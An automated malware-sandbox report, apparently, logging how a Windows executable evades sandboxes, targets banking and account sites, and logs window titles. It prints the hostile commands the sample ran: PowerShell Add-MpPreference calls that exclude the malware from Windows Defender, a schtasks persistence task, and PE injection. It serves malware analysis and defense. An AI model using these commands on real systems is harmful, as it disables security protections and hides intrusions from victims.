                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 6524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XgbXowhljC.exe PID: 5436, type: MEMORYSTR
                    Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeMemory allocated: 12F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeMemory allocated: 4D10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeMemory allocated: 8F10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeMemory allocated: 9F10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeMemory allocated: A120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeMemory allocated: B120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMemory allocated: 1000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMemory allocated: 2D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMemory allocated: 2C70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMemory allocated: 8A90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMemory allocated: 9A90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMemory allocated: 9C80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMemory allocated: AC80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6276Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3413Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6559Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3117Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWindow / User API: foregroundWindowGot 1589Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWindow / User API: foregroundWindowGot 1479
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe TID: 4956Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe TID: 4448Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%"*
                    Source: WebData.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: WebData.14.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: WebData.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: WebData.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: WebData.14.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: WebData.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: WebData.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: WebData.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: WebData.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: WebData.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: WebData.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: WebData.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: WebData.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: WebData.14.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: WebData.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: WebData.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: WebData.14.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: WebData.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: WebData.14.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx+&
                    Source: WebData.14.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: WebData.14.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: WebData.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: WebData.14.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: WebData.14.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: WebData.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: WebData.14.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: WebData.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmtools
                    Source: WebData.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: WebData.14.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: WebData.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: WebData.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeMemory written: C:\Users\user\AppData\Roaming\XgbXowhljC.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp"
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeProcess created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:51]<<Program Manager>>F
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:28]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:39]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:16]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FD3000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:05]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:52]<<Program Manager>>!
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:49]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 14:47:11]<<Program Manager>>
